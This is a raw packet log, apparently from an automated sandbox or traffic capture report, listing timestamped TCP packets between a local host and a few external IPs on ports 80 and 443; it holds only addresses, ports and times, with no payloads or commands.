Jan 14, 2022 00:16:02.786163092 CET	443	49891	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:02.786401987 CET	49891	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:02.813281059 CET	49891	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:02.813324928 CET	443	49891	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:02.813344002 CET	49891	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:02.813355923 CET	443	49891	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:02.846959114 CET	49892	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:02.900943995 CET	80	49892	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:02.901068926 CET	49892	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:02.909997940 CET	49892	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:02.910095930 CET	49892	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:02.963550091 CET	80	49892	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:02.990741014 CET	80	49892	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:02.991458893 CET	49892	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:02.991898060 CET	49892	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:03.043752909 CET	49893	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:03.046315908 CET	80	49892	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:03.096657991 CET	80	49893	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:03.096854925 CET	49893	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:03.097486019 CET	49893	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:03.097493887 CET	49893	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:03.150574923 CET	80	49893	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:03.180135965 CET	80	49893	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:03.180181026 CET	80	49893	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:03.180350065 CET	49893	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:03.181412935 CET	49893	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:03.210341930 CET	49894	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:03.233827114 CET	80	49893	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:03.263593912 CET	80	49894	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:03.264034033 CET	49894	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:03.264255047 CET	49894	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:03.264276981 CET	49894	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:03.286274910 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:03.286402941 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:03.286488056 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:03.309035063 CET	49895	80	192.168.2.4	185.163.45.70
Jan 14, 2022 00:16:03.317683935 CET	80	49894	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:03.350544930 CET	80	49894	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:03.350642920 CET	49894	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:03.350795031 CET	49894	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:03.365701914 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:03.381464005 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:03.381520987 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:03.381999969 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:03.382122040 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:03.382137060 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:03.404660940 CET	80	49894	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:03.437012911 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:03.437165022 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:03.438659906 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:03.438690901 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:03.439279079 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:03.440109968 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:03.485862017 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.019313097 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.019371986 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.019457102 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.019542933 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.019582033 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.019610882 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.019618988 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.019629002 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.019686937 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.019706011 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.044909954 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.044960022 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.045088053 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.045124054 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.045145988 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.045191050 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.045301914 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.045351028 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.045382023 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.045394897 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.045411110 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.045450926 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.046149015 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.046194077 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.046233892 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.046245098 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.046287060 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.046298027 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.070492029 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.070534945 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.070627928 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.070642948 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.070657969 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.070863008 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.070905924 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.070972919 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.070981979 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.071017981 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.071074963 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.071263075 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.071302891 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.071377993 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.071388960 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.071404934 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.071705103 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.071711063 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.071732998 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.071798086 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.071813107 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.071830988 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.071839094 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.071901083 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.071934938 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.072165012 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.072202921 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.072263956 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.072273970 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.072312117 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.072344065 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.072627068 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.072664022 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.072731018 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.072741032 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.072817087 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.072828054 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.073049068 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.095355034 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.095396996 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.095482111 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.095493078 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.095506907 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.095602036 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.098247051 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.098284006 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.098431110 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.098467112 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.098530054 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.098557949 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.098670006 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.098709106 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.098767042 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.098778963 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.098793983 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.098921061 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.099061966 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.099100113 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.099149942 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.099174976 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.099193096 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.099488020 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.099536896 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.099581957 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.099595070 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.099611044 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.099653006 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.099962950 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.099996090 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.100040913 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.100059032 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.100075960 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.100110054 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.100430965 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.100466967 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.100508928 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.100521088 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.100548029 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.100568056 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.100852013 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.100893021 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.100930929 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.100943089 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.100965977 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.101032972 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.101315022 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.101352930 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.101419926 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.101445913 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.101464987 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.101489067 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.101509094 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.101742029 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.101779938 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.101859093 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.101871967 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.101933956 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.102168083 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.102210045 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.102299929 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.102317095 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.102376938 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.102540016 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.102579117 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.102622032 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.102633953 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.102669954 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.102699995 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.144819021 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.144864082 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.144933939 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.144949913 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.144979000 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.144982100 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.145000935 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.145006895 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.145034075 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.145045042 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.145064116 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.145068884 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.145098925 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.145123959 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.145137072 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.145143032 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.145195007 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.145206928 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.145214081 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.145260096 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.145261049 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.145279884 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.145284891 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.145311117 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.145313978 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.145344973 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.145349979 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.145378113 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.145395994 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.145401001 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.145421028 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.145452976 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.145473003 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.145478964 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.145520926 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.145539999 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.145549059 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.145566940 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.145600080 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.145612955 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.145642042 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.145646095 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.145679951 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.145704031 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.145715952 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.145721912 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.145771980 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.145773888 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.145803928 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.145807981 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.145843983 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.145845890 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.145875931 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.145899057 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.145925999 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.145936966 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.145967007 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.145971060 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.146002054 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.146033049 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.146049976 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.146085978 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.146132946 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.146137953 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.146168947 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.146189928 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.146203995 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.146226883 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.146239042 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.146272898 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.146277905 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.146306038 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.146322966 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.146359921 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.146394968 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.146434069 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.146441936 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.146471977 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.146490097 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.146512985 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.146548033 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.146584034 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.146591902 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.146642923 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.146667004 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.146683931 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.146688938 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.146742105 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.146758080 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.146763086 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.146814108 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.146821976 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.146838903 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.146846056 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.146868944 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.146872997 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.146920919 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.146922112 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.146939993 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.146969080 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.146975040 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.147011995 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.147016048 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.147038937 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.147057056 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.148298025 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.170403957 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.170454025 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.170512915 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.170526981 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.170556068 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.170576096 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.170588017 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.170608997 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.170649052 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.170653105 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.170686960 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.170691967 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.170721054 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.170749903 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.170763969 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.170799971 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.170836926 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.170842886 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.170867920 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.170892954 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.170906067 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.170912027 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.170953035 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.170953989 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.170979023 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.170984030 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.171016932 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.171045065 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.171125889 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.171164036 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.171200991 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.171206951 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.171233892 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.171251059 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.173305035 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.173352957 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.173403978 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.173415899 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.173454046 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.173468113 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.184706926 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.184748888 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.184792995 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.184807062 CET	443	49896	144.76.136.153	192.168.2.4
